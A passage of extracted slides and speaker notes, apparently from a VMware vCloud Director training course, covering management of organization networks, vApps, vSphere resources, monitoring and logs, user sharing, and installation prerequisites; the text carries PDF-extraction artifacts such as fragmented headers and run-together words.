organization VDC network, an organization administrator can change DNS resolution settings and

manage static IP pools.

Neither a system administrator nor an organization administrator can change the subnet defined by

an organization VDC network. If you must have an organization VDC network that defines a

different subnet, create a organization VDC network.

System and organization administrators can:

Create new routed organization VDC networks:

- Networks that connect to an edge gateway device

Create new isolated organization VDC networks:

- Networks that do not connect to an edge gateway device

Change the DNS settings for an organization VDC network.

Manage static IP pools for an organization VDC network.

The network range and subnet mask cannot be changed.






Managing vApps

Slide 7-24

A system administrator can place a vApp in maintenance mode to prevent nonadministrator users

from changing the state of the vApp. This prevention is useful, for example, when you want to back

up a vApp using a third-party backup solution.

When a vApp is in maintenance mode, nonadministrator users cannot perform any actions that

modify the state of the vApp or its virtual machine. They can view information about the vApp and

its virtual machines and access the virtual machine consoles. Placing a vApp in maintenance mode

does not affect any currently running tasks that involve the vApp.

A system administrator can “force stop” a running vApp when an organization user is unable to do

so. In some cases, a user might be unable to stop a running vApp. If traditional methods for stopping

the vApp fail, you can force stop the vApp to prevent the user from getting billed. Force stopping a

System administrators can perform these vApp management tasks:

Add vSphere virtual machines to an existing vApp

Create a vApp based on a vSphere virtual machine

Force a vApp to enter maintenance mode

- Place a vApp in maintenance mode to prevent nonadministrator users from

changing the state of the vApp, including the vApp owner.

- Maintenance mode is useful for backing up vApps with third-party software.

- Placing a vApp into maintenance mode does not affect currently running

tasks that involve the vApp.

Other roles do not have rights to these actions.




vApp does not prevent the vApp from consuming resources in vSphere. After you force stop a vApp

in vCloud Director, use the VMware vSphere® Client™ to check the status of the vApp in vSphere

and take the necessary action.

M an a gi n gV Mw

ar ev C l o u d Di r e c t or R e s o ur c e s

7 Lab 13: Managing Organization Resources

Slide 7-25

Manage resources as an organization administrator




Review of Learner Objectives

Slide 7-26


Manage organization policies

Manage organization edge gateways and networks

Manage vApps

Configure organization email notifications




M an a gi n gV Mw

ar ev C l o u d Di r e c t or R e s o ur c e s

7 Key Points

Slide 7-27

Provider VDCs, organization VDCs, external networks, organizationVDC networks, and network pools are considered cloud resources.

After you add cloud resources to vCloud Director, you can modify themand view information about their relationships with one another.

Most management of cloud cells is done from the vCloud Director

server.Questions?







M an a gi n gV Mw ar ev S ph er eR e s o ur c e s

8

M O D U L E 8

Managing VMware vSphere

Resources 8Slide 8-1

Module 8





Course Introduction















8

ImportanceSlide 8-3

VMware vSphere® is the foundation layer for VMware® vCloud

Director®.

vSphere provides the compute, storage, and networking resources

required for the cloud. Knowing how to manage these vSphere

resources from vCloud Director is critical.

In this module, you will learn how to manage vSphere resources from

the vCloud Director console.



Module 8 Managing VMware vSphere Resources 309


By the end of this module, you should be able to meet the following

objectives:

Manage the following vSphere resources:

VMware® vCenter Server systems

Resource pools

VMware® ESXi hosts

vSphere datastores and datastore clusters

vSphere storage policies

Switches and port groups

Stranded items




M a

n a gi n gV Mw ar ev S ph er eR e s o ur c e s

8

vCloud Director in the vSphere Web ClientSlide 8-5

You can see that VMware® vCloud Director® has been connected to VMware® vCenter Server™in the VMware vSphere® Web Client. Go to Home > vCenter Server Extensions. vCloud

Director 5.1 does not communicate status to the vCenter Server system.

vCloud Director appears as an extension inthe VMware vSphere® Web Client undervCenter Solutions Manager after it has beenregistered with vCenter Server.

vCloud Director does not communicate

status to vCenter Server.




Managing vCenter Server SystemsSlide 8-6

There are many things that can be done from the vCloud Director > Manage & Monitor panelconcerning vCenter Server systems. Possible actions include:

• Reconnect to the vCenter Server system

• Refresh information from the vCenter Server system (other than VMware vSphere® storage

policies)

• Refresh information on vSphere storage policies

• Enable or disable a specific vCenter Server system

• Detach a specific vCenter Server system

• Change the connection information or the name of the vCenter Server system as it appears in

vCloud Director

Reconnect to a vCenter Server system.

Refresh information from a vCenter Server system.

Refresh available storage profiles.

Enable or disable a vCenter Server system.

Detach a vCenter Server system.

Open the VMware vSphere Web Client.

Change connection information or name of a

vCenter Server system.

Manage & Monitor > vCenters > <vCenter_Server_system>




vCloud Director

M a

n a gi n gV Mw ar ev S p

h er eR e s o ur c e s

8

Before you upgrade a vCenter Server system that is attached to vCloud Director, you must prepare

the vCenter Server system by using the following procedure:

1. Disable the vCenter Server system in vCloud Director. Wait for the status to change to

Disabled.

2. Upgrade the vCenter Server system using the standard vCenter Server upgrade procedure.

3. After the upgrade on the vCenter Server system is finished, go back to the vCloud Director Web

console, right-click the vCenter Server name, and select Enable.

4. Reregister the vCloud Director with the upgraded vCenter Server system before you start usingit.




Managing Resource Pools at the vSphere Level (1)Slide 8-7

Every provider virtual data center (VDC) in a vCloud Director installation requires a uniqueresource pool in vSphere to provide its compute and memory resources. You must create and

configure resource pools in vSphere before you can add them to a provider VDC, but you can view

information about the resource pools that vCloud Director uses.

You can view information about the used and total CPU and memory reservations for a resource

pool. You can also view information about the datastores that are available to the resource pool.

To view the resource pool properties go to the Manage & Monitor tab, select Resource Pools >resource pool name > Properties.

Here you can see information on a specific resource pool. The information includes:

• Name of the resource pool

M i d / l

You can view information about the resource pools that vCloud Directoruses.

Manage & Monitor > Resource Pools




• Memory reservation used / total

• CPU reservation used/total

M a



8

• Datastores that are available to this resource pool

• Name of each datastore

• Datastore type

• Whether the datastore is connected

• Datastore capacity

• Percentage of space used in the datastore




Managing Resource Pools at the vSphere Level (2)Slide 8-8

The best practice is for each resource pool to be an entire cluster that is dedicated to a providerVDC.

Even though it is not the best practice, you can have multiple resource pools on a single cluster, with

each resource pool being assigned to a different provider VDC. However this design makes it easy

to overcommit resources. If you are going to use multiple resource pools in a single VMware

vSphere® Distributed Resource Scheduler™ cluster you will need to carefully monitor and manage

utilization.

The type of settings used on the resource pool (reservations and limits) should be consistent with the

allocation model that will be used in the organization VDC that leverages each resource pool.

Resource pools created to support Pay-As-You-Go organization VDCs will always have no

reservations or limits. Pay-As-You-Go settings only affect overcommitment. A 100-percent

guarantee means no overcommitment is possible. The lower the percentage, the more

The best practice is for each resource pool to be an entire cluster that isdedicated to a provider virtual data center (VDC).

Multiple resource pools can be on a single cluster, with each resourcepool assigned to a provider. Resources can be overcommitted, socarefully manage the resources to minimize the potential negative

effect. Reservations and limits should be consistent with the allocation model

that will be used in the organization VDC that leverages the pool.

A hierarchical resource pool is not supported with vCloud Director.




overcommitment is possible.

M a



8

Redeploying All Virtual Machines on a HostSlide 8-9

You can move all the virtual machines from one VMware® ESXi™ host to other ESXi hosts in thesame cluster. This ability is useful to unprepare a host, or to perform maintenance on a host without

affecting running virtual machines.

Disable the host first before redeploying the host. When you select Redeploy All VMs then vCloud

Director puts the host into maintenance mode and moves all of its virtual machines to other hosts in

the same cluster.

You redeploy all virtual machines on a host when doing the following:

Performing maintenance on the host

Moving all the virtual machines from one host to another in the same cluster

You must disable the host first.

Redeploy all virtual

machines. vCenter

Server puts this host

into maintenance mode.

Manage & Monitor > Hosts > <host_name> >

Redeploy All VMs




When to Disable a HostSlide 8-10

You can disable a host to prevent VMware vSphere® vApps™ from starting up on the host. Virtualmachines that are already running on the host are not affected.

NOTE

vCloud Director enables or disables the host for all provider VDCs that use its resources.

To prevent VMware vSphere® vApps from starting on the host

To perform maintenance

Manage & Monitor > Hosts > <host_name> >

Disable Host




M a



8

Managing Datastores and Datastore ClustersSlide 8-11

The vCloud Director Manage & Monitor panel reports all available datastores and datastore clusters.In order to take a datastore or a datastore cluster down for maintenance you should disable it first.

After a datastore or datastore cluster has been disabled, no vApps that are assigned to it can be

powered on and no vApps can be created on it.

Disable a datastore or a datastore cluster for

maintenance. No vApps will start on it and no

vApps will be created on it.




Low Disk Space Warnings for a DatastoreSlide 8-12

You can configure low disk space warnings on a datastore. vCloud Director issues a warning emailwhen the datastore reaches a specific threshold of available capacity. These warnings alert you to a

low disk situation before it becomes a problem.

vCloud Director allows you to set two thresholds: yellow and red. When vCloud Director sends an

email alert, the message indicates which threshold was crossed. The yellow threshold determines the

point at which fast provisioning will stop initiating shadow virtual machine creation.

vCloud Director will send an email alert when the datastore crosses the specified threshold.

Email alert is sent

when the datastore

crosses the threshold.

Manage & Monitor > Datastores &

Datastore Clusters >

<datastore_name> > Properties




M a



8

Virtual Machine Migration Between DatastoresSlide 8-13

What if a datastore runs out of space? How do you move running virtual machines from onedatastore to another one?

Although it is possible to manually migrate running virtual machines from one datastore to another

in the vSphere Web Client, this can cause problems for vCloud Director vApps and is not

recommended. Instead you should use VMware vSphere® Storage DRS™ to move powered-on

virtual machines that are part of vCloud Director vApps from one datastore to another. To do this the

datastore must already be part of a datastore cluster.

First vSphere Storage DRS must already be configured in the DRS cluster. Both the datastore you

want to evacuate and other migration candidate datastores must be in a datastore cluster. Use the

vSphere Web Client to place the datastore into Storage DRS Maintenance Mode. vSphere will

automatically move all virtual machines off of that datastore and onto other datastores in the

datastore cluster.

Virtual machines can be moved from one datastore to anotherdatastore by VMware vSphere® Storage DRS.

Both datastores should be part of a datastore cluster.

Place the datastore into vSphere Storage DRS maintenance mode inthe vSphere Web Client.

Virtual machines are automatically moved to other datastores in thedatastore cluster.




If you do not already have the vSphere Web Client open, all submenus in the vCloud Director

Manage & Monitor panel under vSphere Resources have an option to open the vSphere Web Client.

Storage Policies Attached to a DatastoreSlide 8-14

You can determine exactly which vSphere storage policies are attached to a specific datastore byusing Manage & Monitor > Datastores & Datastore Clusters > <datastore_name> > Properties

> Storage Policies. The panel allows you to search for a specific vSphere storage policy if the

vCenter Server system is configured with a large number of vSphere storage policies. The panel will

also report how much storage space on the selected datastore is being actively used by the vSphere

storage policy.

Manage & Monitor > Datastores & Datastore Clusters > <datastore_name> > Properties >

Storage Profiles




M a



8

Storage Policy InformationSlide 8-15

Manage & Monitor > Storage Policies will report all of the vSphere storage policies available tothe system. The panel also reports the number of the VDCs using each vSphere storage policy (both

provider and organization), the number of datastores in each vSphere storage policy, and has much

space has been used, provisioned, and requested.

Number of provider VDCs attached

Number of organization VDCs attached

Space: used, provisioned, and requested

Number of datastores in the storage profile

Manage & Monitor > Storage Profiles




Listing Datastores Assigned to Storage PoliciesSlide 8-16

You have already seen that each datastore can report all of the vSphere storage policies that have been attached to it. It is also possible to get a list of all of the datastores assigned to a specific

vSphere storage policy.

Manage & Monitor > Storage Profiles > <policy_name> > Properties




M a



8

Available Distributed SwitchesSlide 8-17

Manage & Monitor > Switches & Port Groups will report all of the distributed switches that areavailable in the system. This is information-only. There is no way to configure or change these

switches from this menu.

Manage & Monitor > Switches & Port Groups




Switches and Port GroupsSlide 8-18

Manage & Monitor > Switches & Port Groups > Port Groups reports all of the port groups inuse on a distributed switch. This panel gives important information that correlates which cloud

networks are associated with which port groups.

Switches & Port Groups lists all vCenter Server virtual switches andport groups, including those created by vCloud Director:

Type: Distributed or standard

Associated cloud network

Type of cloud network

Manage & Monitor > Switches & Port Groups > Port Groups




M an a gi n gV Mw ar ev S p


8

Stranded ItemsSlide 8-19

When you delete an object in vCloud Director and that object also exists in vSphere, vCloudDirector attempts to delete the object from vSphere. In some situations, vCloud Director might not

be able to delete the object in vSphere. If the attempted deletion fails, the object becomes stranded.

You can view a list of stranded items and try again to delete them, or you can use the vSphere Client

to delete the stranded objects in vSphere.

You can delete a stranded item to try to remove an object from vSphere that you already deleted

from vCloud Director.

If vCloud Director cannot delete a stranded item, you can force delete it to remove it from the

stranded items list. The stranded item continues to exist in vSphere.

Objects deleted from vCloud Director that still exist in vSphere appearas stranded items.

Manage & Monitor > Stranded Items > <stranded_item> >

Delete

vSphere Client




Lab 14: Managing VMware vSphere ResourcesSlide 8-20

Manage vSphere resources





8



Manage the following vSphere resources:

VMware® vCenter Server systems

Resource pools

VMware® ESXi hosts

vSphere datastores and datastore clusters

vSphere storage policies

Switches and port groups

Stranded items





Modify vCenter Server settings to change connection information orname.

Before upgrading a vCenter Server system that is attached to vCloudDirector, you must prepare the vCenter Server system by disabling it invCloud Director.

Selecting Redeploy All VMs on the selected host allows vCloudDirector to put the host into maintenance mode.

You can configure low disk space warnings on a datastore to receivean email from vCloud Director whenever the datastore reaches aspecific threshold of available capacity.

Questions?




M oni t or i n g

V Mw ar ev C l o u d C om p on en t s

9

M O D U L E 9

Monitoring VMware vCloud

Components 9Slide 9-1

Module 9





Course Introduction

VMware vCloud Director Architecture and

Components













M oni t or i n g

V Mw ar ev C l o u d C om p on en t s

9

ImportanceSlide 9-3

Monitoring VMware vCloud® components enables you to see the

performance and availability of the VMware ® vCloud Director®

installation.

Monitoring enables you to keep the cloud running and avoid any

major availability issues for the cloud users.

In this module, you will learn how to monitor vCloud components.



Module 9 Monitoring VMware vCloud Components 333



objectives:

Monitor provider and organization virtual data center use

View system-level and organization-level task and event logs

Enable debug display in task logs

Configure and synchronize Syslog server settings




M oni t or i n g

V Mw ar ev C l o u d C om

p on en t s

9

Task LogSlide 9-5

VMware® vCloud Director® tasks represent long-running operations and their status changes as the

task progresses. For example, a task’s status generally starts as Running. When the task finishes, its

status changes to Successful or Error.

Each task is associated with an owner. The owner is either system or a particular user account. All

tasks with an indicated owner of system are initiated by vCloud Director to perform various

operations, including housekeeping tasks. All tasks with a non-system owner were initiated by a

given user account, such as a system administrator or organization administrator.

Each tasks log entry can be examined to view additional details about the operation. If relevant tothe task performed, a list of associated VMware vSphere® tasks will also be available. When

relevant vSphere tasks are listed, you can obtain further details about each task by selecting the

entry then choosing the Open in VMware vSphere® Web Client option under the Gear menu.

The system administrator can enable and disable the display of debug information in task log details.

When this setting is enabled, debug information pertaining to the task is listed at the bottom of each

task details page. Only the system administrator can change this setting. Debug information will

Task logs are available at the system level and for each organization.

Related VMware vSphere® tasks are included when applicable.




only appear in the task details when viewed by a system administrator.This setting does not control the logging of debug information. Enabling this setting simply means

that debug information may be viewed for any logged task, regardless of when the task was

performed.

Event LogSlide 9-6

vCloud Director events represent one-time occurrences that typically indicate an important part ofan operation or a significant state change for a vCloud Director object. For example, vCloud

Director logs an event when a user initiates the creation an organization virtual data center (VDC)

and another event when the process completes. vCloud Director also logs an event every time a user

logs in and notes whether the attempt was successful or not.

Each event has a target specification that identifies, by name, the vCloud Director infrastructure

component or vCloud Director object that was the focus of the event. For login events, the target

will be the name of the account being used to access the system.

In general, each event is associated with an owner. The owner is either system or a particular user

account. All events with an indicated owner of system are initiated by vCloud Director to perform

various operations, including housekeeping tasks. All events with a non-system owner were initiated

by a given user account, such as a system administrator or organization administrator.

Each events log entry can be examined to view additional details about the event. Event details

never include associated vSphere operations.

Event logs are available at the system level and for each organization.

Click an event to view itsdetails.

Events do not have related

vSphere tasks.




M oni t or i n gV Mw ar ev C l o u d C om

p on en t s

9

Log Activity SettingsSlide 9-7

The system administrator is responsible for configuring activity history settings. Activity historysettings are applied system-wide and include the system logs and all organization logs. Organization

administrators cannot view nor manage activity history settings.

The history shown time frame controls the volume of log data available when viewing logs in the

vCloud Director console interface.

The history to keep time frame defines how long log entries are to be maintained by the system

before being deleted.

The system administrator can also enable the display of task-related debug information. This setting

is covered on the following page.

The system administrator configures activity settings.

How many days log entries are retained before being automatically deleted.

How many days log entries are available for viewing.

Inclusion of debug information when viewing task details.

Activity settings apply to both the task and event logs.




Syslog Server for Cell UseSlide 9-8

When you install vCloud Director, you can specify a Syslog server for cell use. An integratedSyslog collector is included with vSphere 5.1.

The Syslog server for cell use is specified when vCloud Director isinstalled.

An integrated Syslog collector is included with vSphere 5.5.

Any standard Syslog collector can be used.





p on en t s

9

Syslog Settings for NetworksSlide 9-9

You can configure up to two Syslog servers IP addresses for networks to use. This setting does notapply to logging performed by cloud cells. The Syslog servers specified here are for use by edge

gateways and VMware vSphere® vApp™ networks that have a firewall component. Unlike the

Syslog server for cell use, which is configured during vCloud Director installation, the Syslog server

settings for networks are configured after vCloud Director has been installed and deployed.

After configuring or changing the Syslog server settings for networks to use, those settings must be

explicitly synchronized with each organization edge gateway and each running vApp network where

logging is to occur. vApp networks and edge gateways created after the settings have been updatedwill automatically receive new or updated values.

vApp networks will not be updated when an upstream edge gateway is synchronized.

Synchronization must be performed on each deployed vApp network or edge gateway where

logging firewall rules have been configured.

The system administrator must explicitly configure Syslog settings fornetworks:

Can be the same Syslog server for cell use

Configured after vCloud Director has been installed and deployed

Applies to edge gateways and VMware vSphere® vApp networks

Syslog servers for network use are required for firewall rule logging.

Changes to syslog server settings must be manually synchronized.

New edge gateways and vApp networks synchronize once automaticallywhen deployed.

Synchronizing at an edge gateway does not cause synchronization of vAppnetworks.

Synchronization must be performed for each edge gateway and each vAppnetwork where logging is to be performed.

Any user with sufficient rights can synchronize settings.




Monitoring Provider Virtual Data CentersSlide 9-10

You can monitor the utilization of each provider VDC separately and use that information to planmitigation of any resource issues found.

For evaluating resource utilization, you can compare three different types of values: Used,

Allocation, and Overhead. Compare these values to determine if additional resources should be

allotted and to monitor the overall utilization of each provider VDC. You can compare Memory,

Storage, and Processor values.

Used percentages indicate the percentage of pool resources that are consumed by the provider VDC.

Allocation indicates the percentage of pool resources committed to the provider VDC.

Values for each provider virtual data center (VDC) arelisted separately.

Displayed columns can be customized.





p on en t s

9

Monitoring Provider Storage Policies and DatastoresSlide 9-11

You can monitor the utilization of each storage policy used by a provider VDC. Compare the Used,Provisioned, and Requested values to determine which policies are overutilized or underutilized.

You can monitor the utilization of each datastore used by a provider VDC. Datastores cannot be

managed directly in vCloud Director, instead the containing storage policy must be managed.

Compare the Used, Provisioned, and Requested values to determine which policies are overutilized

or underutilized.

Values for each storage policy used by the provider VDC are listedseparately.

Example: Determine which storage policies or datastores areunderutilized.




Monitoring Organization VDCsSlide 9-12

You can monitor CPU, memory, and storage resources for each organization’s VDC. If you see theresources are low, then you can add more resources if needed.

Values for each organization VDC are listed separately.

Displayed columns can be customized.





p on en t s

9

Upload QuarantineSlide 9-13

Quarantine files are vApp templates and media files that users upload to their organization. vCloudDirector enables you to monitor the quarantined files. But you must first enable upload quarantine

and use third-party tools (for example, a virus scanner) to process the uploaded files before vCloud

Director accepts them.

You can use any Java Message Service (JMS) client that understands the STOMP protocol to

monitor and respond to messages from the vCloud Director quarantine service.

When an uploaded file is quarantined, a JMS broker sends a message to a request queue on a cloud

cell. The receiver decides whether to accept or reject the upload by sending a message to a responsequeue.

For details, see the product documentation at www.vmware.com/support/pubs/vcd_pubs.html.

Each vCloud Director server host exposes a number of MBeans through Java Management

Extensions (JMX). This exposure enables operational management of the server and provides access

to internal statistics.

What are MBeans? MBeans are managed beans, Java objects that represent resources to be

All vApps and media files uploaded by users are quarantined for aperiod of time.

Quarantined uploads are not user-accessible until they are accepted bythe system.

Uploads that are not accepted within the specified timeout period are

deleted.




managed. An MBean has a management interface.

What is JMX? JMX is a Java technology that supplies tools for managing and monitoring

applications, system objects, devices (for example, printers) and service oriented networks. Those

resources are represented by objects called MBeans.





p on en t s

9

Viewing vCloud Director LogsSlide 9-14

vCloud Director provides logging information for each cloud cell in the system. You can view the

logs to monitor your cells and to troubleshoot issues.

You can find the logs for a cell at /opt/vmware/cloud-director/logs

Log name What the log shows

cell.log Console output from the vCloud Director cell

vcloud-container-debug.log Debug-level log messages from the cell

vcloud-container-info.log Warnings or errors encountered by the cell

vmware-vcd-watchdog.log When the cell crashed, restarted, and so on

diagnostics.logDiagnostics information (but first must be enabled in

the local logging configuration)

YYYY_MM_DD.request.log HTTP request logs in the Apache common log format

To view these logs, go to /opt/vmware/vcloud-director/logs .




Lab 15: Monitoring Cloud ComponentsSlide 9-15

Monitor cloud components




M oni t or i n gV

Mw ar ev C l o u d C om

p on en t s

9



Monitor provider and organization virtual data center use

View system-level and organization-level task and event logs

Enable debug display in task logs

Configure and synchronize Syslog server settings





You can monitor completed and in-progress operations and viewresource usage information at the following levels:

Provider VDC

Organization VDC

Storage policy

Datastore

You can monitor CPU, memory, and storage resources for eachorganization VDC.

vCloud Director provides logging information for each cloud cell in thesystem.

Questions?





e c t or Or g ani z a t i on U

s er s

1 0

M O D U L E 1 0

VMware vCloud Director

Organization Users 10Slide 10-1

Module 10





Course Introduction














V Mw ar ev C l o u d Di r e c t or Or g ani z a t i on U

s er s

1 0

ImportanceSlide 10-3

Organization users have access to a wide variety of configuration

options and features based on their roles.

In this module, you will learn how to manage VMware vSphere®

vApps from the point of view of an organization user.



Module 10 VMware vCloud Director Organization Users 351



objectives:

Share an organization catalog with other organization users

Change ownership of a vApp

Share a vApp with other organization users

Force customization of a vApp

Reset a vApp network





s er s

1 0

Sharing the Organization CatalogSlide 10-5

Catalogs can be created in a number of ways by different users. When a system administrator creates

a catalog using the VMware® vCloud Director® console main menu, sharing options are not

presented. The catalog will be visible to the organization administrator only, but not shared with

other organization users. Sharing of the catalog with other organization users must be explicitly

configured after the catalog is created.

Catalogs created by any user, including the system administrator, using the New Catalog icon in the

organization catalogs list can be configured for sharing as part of the catalog creation process. By

default, catalogs created in this manner are not shared with other organization users. You must select

the groups and users that will be able to access the catalog, or chose to share the catalog with all

organization users.

Catalogs that are created by the system administrator by using theVMware® vCloud Director® main menu are not automatically sharedwith organization users.

The system administrator or organization administrator must explicitlyconfigure catalog sharing for each catalog.

Catalogs can be shared with other organizations.

If catalogs are shared with another organization, all users in thatorganization have access.




Changing Ownership of a vAppSlide 10-6

Each user has a My Cloud container that shows all of the instantiated VMware vSphere® vApps™

the user has access to. vApps that appear in My Cloud are either owned by the user, have been

shared with the user, or are listed because of the user’s role, such as the organization administrator.

Ownership of a vApp can be transferred to any organization user with vApp User or above rights. A

group of users cannot own management of an instantiated vApp. The system administrator,

organization administrator, or the current vApp owner can change the ownership of a vApp.

Ownership of a vApp can bechanged by:

The system administrator

The organization administrator

The vApp owner

Ownership of a vApp can betransferred to any user account.

Ownership is singular, a group of users cannot own a vApp.





s er s

1 0

Sharing a vApp with Other Organization UsersSlide 10-7

Many users can share access to an instantiated vApp with management of the vApp being restricted

to administrative roles and the vApp owner. vApps can be shared to other users by a system

administrator, an organization administrator, or the vApp owner. The vApp will appear in the My

Cloud container for all users that the vApp has been shared with.

A vApp can be shared to:

All organization users

One or more specific organization users

A vApp can be shared by:

The system administrator

The organization administrator The vApp owner




My Cloud Visibility of vAppsSlide 10-8

A vApp will appear in a user My Cloud container when:

• The user owns the vApp

• The user is a system administrator

• The user is an organization administrator

• The vApp has been shared with the user

The owner column can be used to determine which user is the actual owner of the vApp. This can be

most useful to the administrator roles which have the most visibility.

A vApp is visible in My Cloud for:

System administrators

Organization administrators

The vApp owner

Any account that the vApp has been shared with





s er s

1 0

Forcing RecustomizationSlide 10-9

If the settings on a guest virtual machine are not in synch with vCloud Director or an attempt to

perform guest customization has failed, you can power on and force the recustomization of the

virtual machine.

A system or organization administrator can power on and forcerecustomization of a virtual machine in a vApp.

This action is not applied at the vApp level. It must be executed per virtualmachine.




Resetting a vApp NetworkSlide 10-10

If the network services, such as DHCP and NAT on are not working as expected, an organization

administrator can reset the network. Network services are not unavailable while the reset is

performed.

A system or organization administrator can reset a deployed vAppnetwork.

The vApp network VMware® vShield Edge device is redeployed.





c t or Or g ani z a t i on U

s er s

1 0

Lab 16: Organization UsersSlide 10-11

Manage vApps as an organization user






Share an organization catalog with other organization users

Change ownership of a vApp

Share a vApp with other organization users

Force customization of a vApp

Reset a vApp network





c t or Or g ani z a t i on U

s er s

1 0


Visibility of vApps in My Cloud is based on role, ownership, andsharing.

Organization catalogs are not shared with all organization users bydefault.

Questions?







V Mw ar e

v C l o u d Di r e c t or I n s

t al l a t i on

1

1

M O D U L E 1 1

VMware vCloud Director Installation 11Slide 11-1

Module 11





Course Introduction














V Mw ar e


t al l a t i on

1

1

ImportanceSlide 11-3

VMware vCloud® is a complex system that has many interconnected

components. A proper installation of VMware® vCloud Director®

requires that all of these components be installed and configured

correctly.

Making the correct choices during installation can help save you time

and improve scalability and performance.



Module 11 VMware vCloud Director Installation 365


Lesson 1: Installation Prerequisites

Lesson 2: Installation Procedure




V Mw ar e


t al l a t i on

1

1

Lesson 1: Installation PrerequisitesSlide 11-5

Lesson 1:

Installation Prerequisites






objective:

Describe the prerequisites for vCloud Director installation




V Mw ar e


t al l a t i on

1

1

Configuration RequirementsSlide 11-7

VMware® vCloud Director® has several specific configuration requirements that must be

configured in VMware vSphere®. Most of this can be summarized in the following:

• Resources in the resource cluster should be shared and distributed (networks and storage).

• VMware® vCenter Server™ systems should be set to automated configurations (automated

VMware vSphere® Distributed Resource Scheduler™, automated VMware vSphere® Storage

DRS™).

• All systems in the resource cluster should be preconfigured with verified security. vCenter

Server systems must trust their VMware® ESXi™ hosts.

VMware® vCenter Server networks intended for use as vCloudDirector external networks or network pools must be available to allhosts in any cluster intended for vCloud Director to use.

vSphere distributed switches must be used for cross-host fencing andnetwork pool allocation.

vCenter Server clusters used with vCloud Director must be configured

to use automated VMware vSphere® Distributed ResourceScheduler.

vCenter Server systems must trust their VMware® ESX® or VMware®ESXi hosts.

All hosts in all clusters managed by vCloud Director must be configured torequire verified host certificates.

You must determine, compare, and select matching thumbprints for allhosts.




vSphere Licensing RequirementsSlide 11-8

vCloud Director requires that you have at least two major vSphere licenses. These licenses include

vSphere DRS, licensed by VMware vSphere® Enterprise Edition™ and VMware vSphere®Enterprise Plus Edition™, and VMware vSphere® Distributed Switch™ and dvFilter, licensed by

vSphere Enterprise Plus. These licenses enable the creation and use of vCloud Director isolated

networks.

vCloud Director requires the use of VMware® vShield Manager™ servers in some compatible

form. These must be properly licensed. In vCloud Director 5.1 this will normally be VMware

vCloud® Networking and Security™. A basic license for vCloud Networking and Security is

included with vCloud Director 5.1, but it does not include advanced features.

vCloud Director requires the following vSphere licenses:

vSphere DRS, licensed by VMware vSphere® Enterprise Edition andVMware vSphere® Enterprise Plus Edition

VMware vSphere® Distributed Switch and dvFilter, licensed byvSphere Enterprise Plus. (This license enables creation and use ofvCloud Director isolated networks.)

vCloud Director requires the use of VMware® vShield Managerservers in some compatible form. These servers must be properlylicensed.

The license for VMware vCloud® Networking and Security that is includedwith vCloud Director does not include such features as SSL VPN and loadbalancing.

For virtual private network (VPN) and load balancing, vCloud Directorrequires the fully licensed VMware vCloud® Networking and Security Advanced Edition license.




V Mw ar e


t al l a t i on

1

1

VMware Product Interoperability MatrixesSlide 11-9

VMware® strongly recommends that vCenter Server 5.1 and ESXi 5.1 be used with vCloud

Director 5.1. Although earlier versions are supported, some features will not be available if theseearlier versions are used.

Stateless ESXi hosts were introduced in vSphere 5.0. These are fully supported with vCloud

Director 5.1. Customers should avoid stateless designs that require a host-specific configuration

when the host is going to be used in a VMware vCloud® resource cluster.

For current information about supported products, see VMware

Product Interoperability Matrixes at

http://partnerweb.vmware.com/comp_guide/sim/interop_matrix.php

Supported vCenter Server versions

Supported ESX/ESXi versions

ESXi 5.x is required for fast provisioning and hardware version 8. ESXi 5.5 is required for hardware version 10.

Stateless ESXi is supported.

Supported vCloud Networking and Security or supported vShieldManager versions

New vCloud Director installations should use VMware vCloud® Networkingand Security App for vShield functionality.






M d l 11 VM Cl d Di t I t ll ti 373

V Mw ar e

v C l o u d Di r e c t or I n s t al l a t i on

1

1

vCloud Director Operating System and Server Slide 11-11

vCloud Director must be installed on a Linux system. The following

operating systems are supported by vCloud Director:

CentOS 6, Update 4

Red Hat Enterprise Linux 5 (64-bit), Update 4-9

Red Hat Enterprise Linux 6 (64-bit), Update 1-4

The Linux server that vCloud Director is installed on must meet thefollowing minimum disk and memory requirements:

1350 MB free disk space for installation and log files

1 GB of RAM:

2 GB of RAM is recommended.




374 VMware vCloud Director: Install Configure Manage

Creating Databases and SSL Certificates Before InstallationSlide 11-12

The database that will be used by vCloud Director must be created before installing the first vCloud

Director cell. Specific requirements exist for database configuration and for the rights and privilegesthat the user ID of the vCloud Director service will use to access the database. Make sure your

database administrator reads the section on configuring the database in VMware vCloud Director

Installation and Configuration Guide.

Before installation of vCloud Director, you must install security certificates. This installation should

be done after you have confirmed that your network configuration is correct (including DNS) and

that you have the correct version of Java Runtime Environment. You must use the JRE keytool

command to create your certificate requests.

You can use either self-signed security certificates or certificates that have been issued by an

external certificate authority (CA).

Before installing vCloud Director, you must have the followinginformation:

Location and password of the SSL keystore file

Password for each SSL certificate

Host name or IP address of the database server

Database instance (Microsoft SQL Server) Database service name (Oracle)

Database name and connection port

Database user credentials:

Specific database user privileges are required. See Installing andConfiguring a vCloud Director Database in VMware vCloud Director

Installation and Upgrade Guide.





V Mw ar e


1

1

vCloud Director Network Requirements (1)Slide 11-13

The vCloud Director cell server must have two network interfaces onthe production network.

One TCP/IP address for console connections

One TCP/IP address for HTTP service

IP aliases or multiple network interfaces:

Linux ip addr add does not work.

Network Time Service:

Use NTP to synchronize all vCloud Director servers and their databaseserver.

The maximum allowable drift is two seconds.

All vCloud Director servers, including the database server, must beconfigured to be in the same time zone.






Host name resolution:

All host names specified during vCloud Director installation must beresolvable by DNS:

Forward and reverse lookup

Fully qualified domain name

Unqualified host name

Use the nslookup command to confirm with the vCloud Director server.

Examples for mycloud.example.com, with a console IP address of192.168.1.1 and an HTTPS address of 192.168.1.2:

nslookup mycloud

nslookup mycloud.example.com

nslookup 192.168.1.1

nslookup 192.168.1.2





V Mw ar e


1

1


Transfer server storage is used as temporary storage for uploads anddownloads:

NFS or other shared storage must be accessible to all vCloud Directorservers in a vCloud Director cluster.

Volume must have write permission for root.

Must be mounted at $VCLOUD_HOME/data/transfer

- A single vCloud Director server uses /opt/vmware/vcloud-director/data/transfer by default.

Uploads and downloads occupy this storage for up to 24 hours.

Transferred images can be large.

Recommended size of storage is several hundred gigabytes.




vCloud Director Network Security RequirementsSlide 11-16

Connections to the vCloud Director server from the Internet and from public networks must be

tightly controlled. The only port that is recommended to be open to the Internet and public networksis 443 (HTTPS). This port should be open only if you are using a public cloud model and plan to

have external customers access the vCloud Director console from public or Internet-connected

systems.

Do not connect vCloud Director servers directly to the public Internet.

Always protect vCloud Director servers with a firewall.

A vCloud Director server should have only port 443 (HTTPS) open forincoming connections from the Internet or other public networks.

